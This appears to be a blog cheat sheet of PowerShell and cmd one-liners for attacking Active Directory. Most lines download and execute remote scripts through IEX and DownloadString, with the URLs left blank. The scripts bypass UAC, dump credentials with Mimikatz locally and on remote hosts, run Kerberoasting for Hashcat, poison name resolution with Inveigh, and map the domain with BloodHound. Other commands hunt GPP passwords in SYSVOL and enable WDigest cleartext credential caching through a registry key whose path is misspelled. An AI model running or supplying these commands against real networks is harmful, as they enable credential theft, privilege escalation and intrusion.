AD exploitation Powershell Cheatsheet

ad powershell cheatsheet
AD exploitation & Post exploitationAll Blog


# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘’);Invoke-BypassUAC -Command ‘start powershell.exe'”
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘’);Invoke-Mimikatz -DumpCreds”
# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C “IEX (New-Object Net.WebClient).DownloadString(‘’)”
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘’);’$env:COMPUTERNAME’|Invoke-MassMimikatz -Verbose”
# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘’);Invoke-AllChecks”
# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘’);Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y”
# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘’);Invoke-kerberoast -OutputFormat Hashcat”
# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘’);Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt”
# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C “IEX (New-Object Net.WebClient).DownloadString(‘’)”
# Invoke-Bloodhound
powershell.exe -exec Bypass -C “IEX(New-Object Net.Webclient).DownloadString(‘’);Invoke-BloodHound”
# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1

Leave a Reply

Your email address will not be published. Required fields are marked *